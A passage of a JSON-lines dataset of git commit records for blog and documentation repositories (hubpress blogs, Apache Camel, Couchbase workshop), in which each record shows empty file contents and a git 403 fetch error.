ress.io,eimajenthat\/hubpress.io,hang-h\/hubpress.io,ssundarraj\/hubpress.io,codetricity\/journey,adjiebpratama\/press,chackomathew\/blog,fwalloe\/infosecbriefly,Jason2013\/hubpress,isaacriquelme\/endata.do,tmdgus0118\/blog.code404.co.kr,brendena\/hubpress.io,mgreau\/posts,OdieD8\/hubpress.io,nicolaschaillot\/pechdencouty,julianrichen\/blog,Abdul2\/abdul2.github.io,pdudits\/hubpress,danen-carlson\/blog,IEEECompute\/blog,RussellSnyder\/hubpress-test,Astrokoala-Studio\/hubpress.io,simpleHoChun\/blog,ruaqiwei23\/blog,trangunghoa\/hubpress.io,J0HDev\/blog,jmini\/hubpress.io,agentmilindu\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,corporatesanyasi\/corporatesanyasi.github.io,codelab-lbernard\/blog,magivfer\/pages,chackomathew\/blog,aql\/hubpress.io,joescharf\/joescharf.github.io,baocongchen\/blogs,AlexL777\/hubpressblog,Perthmastersswimming\/hubpress.io,codetricity\/journey,anwfr\/blog.anw.fr,porolakka\/hubpress.io,rrrhys\/blog.codeworkshop.com.au,diodario\/hubpress.io,OlympusOnline2\/announcements,JiajiaGuo\/jiajiaguo.github.io,mikqi\/blog,rynop\/rynop.hubpress.io,timofei7\/onroutenow,jsiu22\/blog,jjmean2\/server-study,schweitzer\/hubpress.io,philippevidal80\/blog,juhuntenburg\/gsoc2017,sharmivssharmi\/sharmipress,rubyinhell\/hubpress.io,semarium\/blog,duggiemitchell\/JavascriptMuse,ucide-coruptia\/ucide-coruptia.ro,Evolution2626\/blog,yelangya3826850\/monaenhubpress,henryouly\/henryouly.github.io,jpcanovas\/myBlog,palaxi00\/palaxi00.github.io,julianrichen\/blog,binout\/javaonemorething,jbutz\/hubpress-test,Sth0nian\/hubpress.io,OdieD8\/hubpress.io,discimport\/blog.discimport.dk,thaibeouu\/blog,willcrisis\/www.willcrisis.com,AlexL777\/hubpressblog,andreassiegelrfid\/hubpress.io,pascalgrimaud\/hubpress.io,tedbergeron\/hubpress.io,JacobSamro\/blog,Abdul2\/abdul2.github.io,apoch\/blog,hutchr\/hutchr.github.io,loetjoe\/blog,nicksam112\/nicksam112.github.io,thaibeouu\/blog,jmini\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,hva314\/blog,atomfrede\/shiny-adventure,jbutz\/hubpress-test,redrabbit-calligraphy\/redrabbit-calligraphy-blog,freekrai\/hubpress,csiebler\/hubpress-test,Codearte\/hubpress.io,codelab-lbernard\/blog,apoch\/blog,mathieu-pousse\/hubpress.io,Abdul2\/abdul2.github.io,btsibr\/myhubpress,yangsheng1107\/hubpress.io,baocongchen\/blogs,yaks-all-the-way-down\/hubpress.github.io,porolakka\/hubpress.io,fw4spl-org\/fw4spl-blog,nicolaschaillot\/pechdencouty,Port666\/hubpress.io,OlympusOnline2\/announcements,nthline\/hubpress.io,jcsirot\/hubpress.io,xinmeng1\/note,jerometambo\/blog,jiashengc\/blog,mufarooqq\/blog,gbougeard\/blog.english,wzzrd\/hubpress.io,abesn\/hubpress.io,mrtrombley\/blog,joescharf\/joescharf.github.io,MinxianLi\/hubpress.io,schweitzer\/hubpress.io,trangunghoa\/hubpress.io,Cribstone\/humblehacker,filipeuva\/filipeuva.blog,nthline\/hubpress.io,kobusb\/blog,qingyuqy\/qingyuqy.io,trycrmr\/hubpress.io,palaxi00\/palaxi00.github.io,schweitzer\/hubpress.io,jjmean2\/server-study,aql\/hubpress.io,harichen\/harichen.io,envyen\/blog,rorosaurus\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,dsuryakusuma\/dsuryakusuma.github.io,heartnn\/hubpress.io,rynop\/rynop.hubpress.io,princeminz\/blog,tedbergeron\/hubpress.io,crotel\/studio,paolo215\/blog,adamperer\/diary,ottoandry\/ottoandry1,porolakka\/hubpress.io,pdudits\/hubpress,liyucun\/blog,itsmyr4bbit\/blog,manelvf\/blog,rrrhys\/blog.codeworkshop.com.au,DaOesten\/hubpress.io,ml4den\/hubpress,JacobSamro\/blog,Jekin6\/blog,tehbilly\/blog,hiun\/hubpress.io,artavels\/pages,benignbala\/hubpress.io,juhuntenburg\/gsoc2017,seturne\/hubpress.io,entropyz\/blog,philippevidal80\/blog,cmhgroupllc\/blog,topicusonderwijs\/topicusonderwijs.github.io,dmacstack\/glob,codetricity\/journey,crotel\/meditation,willcrisis\/www.willcrisis.com,pdudits\/pdudits.github.io,Perthmastersswimming\/hubpress.io,ottoandry\/ottoandry1,envyen\/blog,amberry\/blog,jabbytechnologies\/blog,brendena\/hubpress.io,Port666\/hubpress.io,matthardwick\/hubpress.io,rjhbrunt\/hubpress.io,TeksInHelsinki\/en,christofmarti\/blog,whelamc\/life,willcrisis\/www.willcrisis.com,filipeuva\/filipeuva.blog,magivfer\/pages,mrtrombley\/blog,fw4spl-org\/fw4spl-blog,mimiz\/mimiz.github.io,tom-konda\/blog,atomfrede\/shiny-adventure,discimport\/blog.discimport.dk,shinnoki\/hubpress.io,jiashengc\/blog,anthonny\/personal-blog,pepite\/hubpress.io,berryzed\/tech-blog,ReadyP1\/hubpress.io,thesagarsutar\/hubpress,binout\/javaonemorething,pej\/hubpress.io,anshu92\/blog,gsha0\/hubpress.io,lichengzhu\/blog,rubyinhell\/hubpress.io,lrabiet\/patisserie,amberry\/blog,Cribstone\/humblehacker,lauesa\/Blog,yelangya3826850\/monaenhubpress,matthardwick\/hubpress.io,thaibeouu\/blog,crobby\/hubpress.io,leomedia\/blog,devananda\/devananda.github.io,danen-carlson\/blog,timofei7\/onroutenow,mathieu-pousse\/hubpress.io,loetjoe\/blog,fastretailing\/blog,jerometambo\/blog,trycrmr\/hubpress.io,joshuarrrr\/hubpress.io,pascalgrimaud\/hubpress.io,ncomet\/asciiblog,SnorlaxH\/blog.urusa.me,jamarortiz\/pragmaticalware,alexhanschke\/hubpress.io,amberry\/blog,mcornell\/OFM,xinmeng1\/note,lawrencetaylor\/hubpress.io,SockPastaRock\/hubpress.io,jjmean2\/server-study,ice09\/ice09ng,gogonkt\/makenothing,josegomezr\/blog,ciena-blueplanet\/developers.blog,SockPastaRock\/hubpress.io,ottoandry\/ottoandry1,MinxianLi\/hubpress.io,freekrai\/hubpress,semarium\/blog,ncomet\/asciiblog,freekrai\/hubpress,baocongchen\/blogs,andreassiegelrfid\/hubpress.io,hanwencheng\/Undepth,duggiemitchell\/JavascriptMuse,heartnn\/hubpress.io,itsmyr4bbit\/blog,Perthmastersswimming\/hubpress.io,fastretailing\/blog,hanwencheng\/hanwenblog,RussellSnyder\/hubpress-test,jmnarloch\/blog.io,liyucun\/blog,rorosaurus\/hubpress.io,berryzed\/tech-blog,clear-project\/blog,entropyz\/blog,sillyleo\/bible.notes,ErJ101\/hbspractise,jfavlam\/Concepts,xinmeng1\/note,abhayghatpande\/hubpress.io,jlmcgehee21\/nooganeer,Astrokoala-Studio\/hubpress.io,moonPress\/press.io,nicksam112\/nicksam112.github.io,gilangdanu\/blog,rynop\/rynop.hubpress.io,trycrmr\/hubpress.io,ashalkhakov\/hubpress.io,Codearte\/hubpress.io,ambarishpande\/blog,e-scape\/blog,IEEECompute\/blog,arseniuss\/blog.arseniuss.id.lv,fbridault\/sandblog,demiansan\/demiansan.github.io,julianrichen\/blog,201507\/blog,andreassiegelrfid\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,jfavlam\/Concepts,e-scape\/blog,aspick\/hubpress.io,Port666\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,gilangdanu\/blog,SockPastaRock\/hubpress.io,simpleHoChun\/blog,anandjagadeesh\/blog,isaacriquelme\/endata.do,adamperer\/diary,mairandomness\/randomblog,cherurg\/hubpress.io,anthonny\/personal-blog,mrfgl\/blog,mairandomness\/randomblog,crobby\/hubpress.io,pascalgrimaud\/hubpress.io,envyen\/blog,elinep\/blog,ErJ101\/hbspractise,seturne\/hubpress.io,Port666\/hubpress.io,mimiz\/mimiz.github.io,pej\/hubpress.io,fghhfg\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,mrfgl\/blog,discimport\/blog.discimport.dk,ditirambo\/ditirambo.es,mrtrombley\/blog,Jason2013\/hubpress,e-scape\/blog,wzzrd\/hubpress.io,ciena-blueplanet\/developers.blog,rh0\/the-myriad-path,lauesa\/Blog,nicolaschaillot\/pechdencouty,msavy\/rhymewithgravy.com,tom-konda\/blog,dsuryakusuma\/dsuryakusuma.github.io,tedbergeron\/hubpress.io,koter84\/blog,cmolitor\/blog,ditirambo\/ditirambo.es,manelvf\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,simonturesson\/hubpresstestsimon,matthardwick\/hubpress.io,marksubbarao\/hubpress.io,cmhgroupllc\/blog,201507\/blog,RussellSnyder\/hubpress-test,msavy\/rhymewithgravy.com,cmolitor\/blog,kobusb\/blog,sebprev\/blog,gsha0\/hubpress.io,shinnoki\/hubpress.io,Sth0nian\/hubpress.io,trycrmr\/hubpress.io,JacobSamro\/blog,palaxi00\/palaxi00.github.io,eimajenthat\/hubpress.io,akhmetgali\/hubpress.io,mkc188\/hubpress.io,tom-konda\/blog,mkc188\/hubpress.io,entropyz\/blog,dawn-chiniquy\/clear-project.org,jamarortiz\/pragmaticalware,shunkou\/blog,topluluk\/blog,csiebler\/hubpress-test,roelvs\/hubpress.io,topluluk\/blog,rorosaurus\/hubpress.io,christofmarti\/blog,laibaogo\/hubpress.io,PerthHackers\/blog,anwfr\/blog.anw.fr,crobby\/hubpress.io,adjiebpratama\/press,leomedia\/blog,celsogg\/blog,ReadyP1\/hubpress.io,plyom\/hubpress.io,Nepal-Blockchain\/danphe-blogs,setupminimal\/blog,anwfr\/blog.anw.fr,akhmetgali\/hubpress.io,shunkou\/blog,metadevfoundation\/metadevfoundation.github.io,mgreau\/posts,tmdgus0118\/blog.code404.co.kr,bemug\/devblog,Nepal-Blockchain\/danphe-blogs,marksubbarao\/hubpress.io,kornel661\/blog-test-jm,demiansan\/demiansan.github.io,binout\/javaonemorething,trangunghoa\/hubpress.io,mgreau\/posts,philippevidal80\/blog,jerometambo\/blog,PerthHackers\/blog,jpcanovas\/myBlog,eimajenthat\/hubpress.io,thaibeouu\/blog,simonturesson\/hubpresstestsimon,harichen\/harichen.io,AirHacX\/blog.airhacx.com,yelangya3826850\/monaenhubpress,miroque\/shirokuma,anandjagadeesh\/blog,victorcouste\/blog,plyom\/hubpress.io,qingyuqy\/qingyuqy.io,sanctumware\/hubpress,pej\/hubpress.io,sebarid\/pages,blackGirlsCode\/blog,J0HDev\/blog,anshu92\/blog,alexknowshtml\/thebigmove,dsuryakusuma\/dsuryakusuma.github.io,woehrl01\/woehrl01.hubpress.io,blackGirlsCode\/blog,natsu90\/hubpress.io,AlexL777\/hubpressblog,roelvs\/hubpress.io,clear-project\/blog,sharmivssharmi\/sharmipress,OlympusOnline2\/announcements,laibaogo\/hubpress.io,gogonkt\/makenothing,heartnn\/hubpress.io,jlcurty\/jlcurty.github.io-,shinnoki\/hubpress.io,benignbala\/benignbala.hubpress.io,jcsirot\/hubpress.io,whelamc\/life,vuthaihoc\/vuthaihoc.github.io,PerthHackers\/blog,hanwencheng\/hanwenblog,ice09\/ice09ng,booleanbalaji\/hubpress.io,Adyrhan\/adyrhan.github.io,Lukas238\/the-holodeck,arseniuss\/blog.arseniuss.id.lv,MinxianLi\/hubpress.io,lrabiet\/patisserie,juhuntenburg\/gsoc2017,igovsol\/blog,nicksam112\/nicksam112.github.io,pramodjg\/articles,fghhfg\/hubpress.io,jmnarloch\/blog.io,alexknowshtml\/thebigmove,Codearte\/hubpress.io,ambarishpande\/blog,roelvs\/hubpress.io,rorohiko21\/blog,gogonkt\/makenothing,plyom\/hubpress.io,Jekin6\/blog,Bloggerschmidt\/bloggerschmidt.de,abhayghatpande\/hubpress.io,ssundarraj\/hubpress.io,mikqi\/blog,fwalloe\/infosecbriefly,amberry\/blog,paolo215\/blog,Evolution2626\/blog,jsiu22\/blog,sakkemo\/blog,simonturesson\/hubpresstestsimon,bemug\/devblog,jlmcgehee21\/nooganeer,josegomezr\/blog,iKnowMagic\/hubpress.io,elinep\/blog,miroque\/shirokuma,rh0\/the-myriad-path,semarium\/blog,laibaogo\/hubpress.io,josegomezr\/blog,Jekin6\/blog,julianrichen\/blog,fghhfg\/hubpress.io,anshu92\/blog,thesagarsutar\/hubpress,brendena\/hubpress.io,benignbala\/benignbala.hubpress.io,heartnn\/hubpress.io,christofmarti\/blog,seturne\/hubpress.io,hang-h\/hubpress.io,Adyrhan\/adyrhan.github.io,imukulsharma\/imukulsharma.github.io,mcornell\/OFM,rynop\/rynop.hubpress.io,fw4spl-org\/fw4spl-blog,lauesa\/Blog,adjiebpratama\/press,aspick\/hubpress.io,topluluk\/blog,booleanbalaji\/hubpress.io,jamarortiz\/pragmaticalware,palaxi00\/palaxi00.github.io,duggiemitchell\/JavascriptMuse,sebprev\/blog,hang-h\/hubpress.io,flug\/flug.github.io,joshuarrrr\/hubpress.io,Lukas238\/the-holodeck,alexhanschke\/hubpress.io,errorval\/blog,jabbytechnologies\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,Astrokoala-Studio\/hubpress.io,jbutz\/hubpress-test,kornel661\/blog-test-jm,artavels\/pages,cmolitor\/blog,jiashengc\/blog,lrabiet\/patisserie,anwfr\/blog.anw.fr,jmini\/hubpress.io,fastretailing\/blog,sebarid\/pages,alexhanschke\/hubpress.io,sillyleo\/bible.notes,victorcouste\/blog,rorohiko21\/blog,princeminz\/blog,josegomezr\/blog,devananda\/devananda.github.io,josegomezr\/blog,rrrhys\/blog.codeworkshop.com.au,sebarid\/pages,adest\/press,TeksInHelsinki\/en,princeminz\/blog,moonPress\/press.io,puff-tw\/hubpress.io,arabindamoni\/hubpress.io,ashalkhakov\/hubpress.io,aspick\/hubpress.io,melix\/hubpress,koter84\/blog,ncomet\/asciiblog,hanwencheng\/Undepth,seturne\/hubpress.io,hutchr\/hutchr.github.io,sakkemo\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,mufarooqq\/blog,jabbytechnologies\/blog,sxgc\/blog,binout\/javaonemorething,thesagarsutar\/hubpress,mkent-at-rivermeadow-dot-com\/hubpress.io,andreassiegelrfid\/hubpress.io,nandansaha\/AroundTheWeb,celsogg\/blog,erramuzpe\/gsoc2016,crobby\/hubpress.io,ruaqiwei23\/blog,fbridault\/sandblog,christofmarti\/blog,fghhfg\/hubpress.io,pdudits\/pdudits.github.io,btsibr\/myhubpress,pramodjg\/articles,DavidTPate\/davidtpate.com,arabindamoni\/hubpress.io,aql\/hubpress.io,puff-tw\/hubpress.io,sillyleo\/bible.notes,arseniuss\/blog.arseniuss.id.lv,jabbytechnologies\/blog,kim0\/hubpress.io,diodario\/hubpress.io,tmdgus0118\/blog.code404.co.kr,hanwencheng\/hanwenblog,erramuzpe\/gsoc2016,cmolitor\/blog,koter84\/blog,elinep\/blog,benignbala\/benignbala.hubpress.io,adest\/press,lichengzhu\/blog,manelvf\/blog,mcrotty\/hubpress.io,mikqi\/blog,lichengzhu\/blog,itsmyr4bbit\/blog,jpcanovas\/myBlog,miroque\/shirokuma,whelamc\/life,DavidTPate\/davidtpate.com,benignbala\/hubpress.io,Cribstone\/humblehacker,JohanBrunet\/hubpress.io,natsu90\/hubpress.io,timofei7\/onroutenow,AnassKartit\/anasskartit.github.io,eimajenthat\/hubpress.io,lichengzhu\/blog,sebarid\/pages,cmhgroupllc\/blog,jcsirot\/hubpress.io,lawrencetaylor\/hubpress.io,anthonny\/personal-blog,magivfer\/pages,msavy\/rhymewithgravy.com,OdieD8\/hubpress.io,hutchr\/hutchr.github.io,joescharf\/joescharf.github.io,AnassKartit\/anasskartit.github.io,simpleHoChun\/blog,topicusonderwijs\/topicusonderwijs.github.io,IEEECompute\/blog,clear-project\/blog,codelab-lbernard\/blog,crotel\/studio,blackGirlsCode\/blog,rjhbrunt\/hubpress.io,pramodjg\/articles,jlcurty\/jlcurty.github.io-,ciena-blueplanet\/developers.blog,AirHacX\/blog.airhacx.com,adamperer\/diary,aspick\/hubpress.io,mcrotty\/hubpress.io,hva314\/blog,nandansaha\/AroundTheWeb,plyom\/hubpress.io,pramodjg\/articles,bemug\/devblog,sanctumware\/hubpress,alexknowshtml\/thebigmove,nthline\/hubpress.io,OlympusOnline2\/announcements,gscheibel\/blog,loetjoe\/blog,anthonny\/personal-blog,paolo215\/blog,PerthHackers\/blog,abesn\/hubpress.io,akhmetgali\/hubpress.io,vuthaihoc\/vuthaihoc.github.io,philippevidal80\/blog,hiun\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,msavy\/rhymewithgravy.com,brieb\/hubpress.io,alexknowshtml\/thebigmove,pej\/hubpress.io,JohanBrunet\/hubpress.io,ncomet\/asciiblog,yangsheng1107\/hubpress.io,woehrl01\/woehrl01.hubpress.io,cherurg\/hubpress.io,jsiu22\/blog,melix\/hubpress,rorohiko21\/blog,DavidTPate\/davidtpate.com,redrabbit-calligraphy\/redrabbit-calligraphy-blog,jsiu22\/blog,simonturesson\/hubpresstestsimon,melix\/hubpress,rorosaurus\/hubpress.io,igovsol\/blog,jlcurty\/jlcurty.github.io-,imukulsharma\/imukulsharma.github.io,Evolution2626\/blog,loetjoe\/blog,puff-tw\/hubpress.io,koter84\/blog,cherurg\/hubpress.io,mathieu-pousse\/hubpress.io,ambarishpande\/blog,juhuntenburg\/gsoc2017,benignbala\/hubpress.io,DaOesten\/hubpress.io,ml4den\/hubpress,metadevfoundation\/metadevfoundation.github.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,Lukas238\/the-holodeck,mrfgl\/blog,jjmean2\/server-study,OdieD8\/hubpress.io,igovsol\/blog,fwalloe\/infosecbriefly,mufarooqq\/blog,matthardwick\/hubpress.io,abhayghatpande\/hubpress.io,ditirambo\/ditirambo.es,hiun\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,crotel\/meditation,liyucun\/blog,crotel\/studio,gscheibel\/blog,yaks-all-the-way-down\/hubpress.github.io,mcornell\/OFM,mairandomness\/randomblog,mrfgl\/blog,miroque\/shirokuma,AnassKartit\/anasskartit.github.io,arseniuss\/blog.arseniuss.id.lv,willcrisis\/www.willcrisis.com,Perthmastersswimming\/hubpress.io,atomfrede\/shiny-adventure,mkent-at-rivermeadow-dot-com\/hubpress.io,Abdul2\/abdul2.github.io,arabindamoni\/hubpress.io,natsu90\/hubpress.io,TeksInHelsinki\/en,Nepal-Blockchain\/danphe-blogs,jlmcgehee21\/nooganeer,mufarooqq\/blog,flug\/flug.github.io,dmacstack\/glob,vuthaihoc\/vuthaihoc.github.io,Bloggerschmidt\/bloggerschmidt.de,DavidTPate\/davidtpate.com,hanwencheng\/Undepth,gbougeard\/blog.english,jmnarloch\/blog.io,tmdgus0118\/blog.code404.co.kr,lawrencetaylor\/hubpress.io,jbutz\/hubpress-test,ashalkhakov\/hubpress.io,ErJ101\/hbspractise,berryzed\/tech-blog,Adyrhan\/adyrhan.github.io,pdudits\/hubpress,setupminimal\/blog,nandansaha\/AroundTheWeb,pdudits\/pdudits.github.io,brieb\/hubpress.io,sebprev\/blog,akhmetgali\/hubpress.io,sharmivssharmi\/sharmipress,kornel661\/blog-test-jm,porolakka\/hubpress.io,BenBals\/hubpress,mcrotty\/hubpress.io,gogonkt\/makenothing,SockPastaRock\/hubpress.io,SnorlaxH\/blog.urusa.me,fbridault\/sandblog,iKnowMagic\/hubpress.io,pepite\/hubpress.io,crotel\/meditation,flug\/flug.github.io,isaacriquelme\/endata.do,ambarishpande\/blog,ottoandry\/ottoandry1,mcrotty\/hubpress.io,dawn-chiniquy\/clear-project.org,AnassKartit\/anasskartit.github.io,brendena\/hubpress.io,ReadyP1\/hubpress.io,artavels\/pages,BenBals\/hubpress,DaOesten\/hubpress.io,ruaqiwei23\/blog,melix\/hubpress,SnorlaxH\/blog.urusa.me,btsibr\/myhubpress,yangsheng1107\/hubpress.io,rorohiko21\/blog,setupminimal\/blog,rjhbrunt\/hubpress.io,mrtrombley\/blog,abesn\/hubpress.io,woehrl01\/woehrl01.hubpress.io,jerometambo\/blog,gbougeard\/blog.english,DaOesten\/hubpress.io,pepite\/hubpress.io,nthline\/hubpress.io,qingyuqy\/qingyuqy.io,erramuzpe\/gsoc2016,celsogg\/blog,setupminimal\/blog","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ab7638c4f4a515b3116f9594683caa1a94f7b6b","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85e9753b9ac809b9ef40d9f6da7e9fcccc6b382b","subject":"Update 2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1028cc68926abcc3e59c4e76aae92b55c77b04a","subject":"Create les_principes.adoc","message":"Create les_principes.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"les_principes.adoc","new_file":"les_principes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"6605698072c05e460219d74392269cf3138964a7","subject":"added abstracts for the developer workshop sessions","message":"added abstracts for the developer workshop sessions\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3e0d49b1fb880fd0499e1e229f322ec69970945","subject":"y2b create post Make Wired Headphones Wireless!","message":"y2b create post Make Wired Headphones Wireless!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-17-Make-Wired-Headphones-Wireless.adoc","new_file":"_posts\/2016-01-17-Make-Wired-Headphones-Wireless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b798bd8a7908dd89ddbc7211096e124fdab8cea","subject":"Update 2017-02-07-Managing-docker-compose-Part-1.adoc","message":"Update 2017-02-07-Managing-docker-compose-Part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose-Part-1.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e03bf328c7361f1f702914dec6be1ecc94296018","subject":"Deleted _posts\/2016-10-27-Test.adoc","message":"Deleted _posts\/2016-10-27-Test.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Test.adoc","new_file":"_posts\/2016-10-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6ca368d004c565f4ce36cc6fa5051d73178776","subject":"Update 2017-11-18-Oyku.adoc","message":"Update 2017-11-18-Oyku.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-18-Oyku.adoc","new_file":"_posts\/2017-11-18-Oyku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed250186b2b0d3462081fe569c7abf22c4f5d15","subject":"Added Camel 2.19.4 release notes to docs","message":"Added Camel 2.19.4 release notes to docs\n","repos":"onders86\/camel,ullgren\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,pmoerenhout\/camel,onders86\/camel,apache\/camel,apache\/camel,nicolaferraro\/camel,apache\/camel,ullgren\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,adessaigne\/camel,davidkarlsen\/camel,kevinearls\/camel,mcollovati\/camel,cunningt\/camel,zregvart\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,cunningt\/camel,nicolaferraro\/camel,pmoerenhout\/camel,sverkera\/camel,punkhorn\/camel-upstream,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,DariusX\/camel,tadayosi\/camel,pax95\/camel,kevinearls\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,Fabryprog\/camel,mcollovati\/camel,CodeSmell\/camel,zregvart\/camel,cunningt\/camel,kevinearls\/camel,jamesnetherton\/camel,CodeSmell\/camel,sverkera\/camel,nikhilvibhav\/camel,kevinearls\/camel,jamesnetherton\/camel,onders86\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,pax95\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,punkhorn\/camel-upstream,adessaigne\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,mcollovati\/camel,alvinkwekel\/camel,DariusX\/camel,CodeSmell\/camel,DariusX\/camel,mcollovati\/camel,Fabryprog\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,jamesnetherton\/camel,zregvart\/camel,pax95\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,ullgren\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,sverkera\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,tdiesler\/camel,anoordover\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,kevinearls\/camel,anoordover\/camel,tdiesler\/camel,davidkarlsen\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,jamesnetherton\/camel,cunningt\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2194-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2194-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d16f1a45d1ea841df030cb3def441b435548d797","subject":"Update 2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","message":"Update 2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","new_file":"_posts\/2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8ac4181ff2cd9bb7c1d37dd2ee95c1b4eb1f7d6","subject":"Update 2015-06-24-Mon-premier-talk.adoc","message":"Update 